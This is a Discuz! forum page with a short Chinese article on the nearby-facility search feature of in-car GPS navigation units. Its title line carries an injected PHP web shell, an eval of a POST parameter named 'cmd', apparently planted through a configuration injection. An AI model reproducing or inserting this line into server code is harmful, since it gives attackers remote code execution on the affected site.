');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 掌中活地圖 車載PND周邊設施應用解析 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

掌中活地圖 車載PND周邊設施應用解析

「喂?你在朝陽路那個包子鋪等我!」

「哎?哪個包子鋪啊?朝陽路邊上包子鋪多了!」

「嗨!就是十里堡車站邊上那個,對了,你車裡不是有GPS嗎?快點!就等你了!」

「......GPS怎麼找包子鋪啊?」

    上述一段對話似乎有些誇張的成分,不過在現實生活中許多GPS用戶可能都會遇到類似的問題,目的地不明確,想要去的地方不知道怎麼找,往往弄得人一頭霧水。在實際使用中,許多情況使得用戶無法獲得目的地的明確信息。例如對於目的地的大概方位和方向比較瞭解但具體到飯店、寫字樓的名稱時卻無法確定,此外遇到油荒、內急等突發情況時,往往通過普通目的地查找而搜索出來的幾百條POI信息使得用戶眼花繚亂、無從下手。

    其實,作為車載PND內置地圖的一個普通功能--周邊設施查找,卻往往能在某些狀況下為用戶提供不同尋常的幫助。通過地圖內置的周邊設施查找選項,設定好查找範圍、設施類型等,目的地搜尋的準確性相當高,可以給用戶帶來意想不到的導航體驗

 

留個言問候一聲,祝您平安順利
返回列表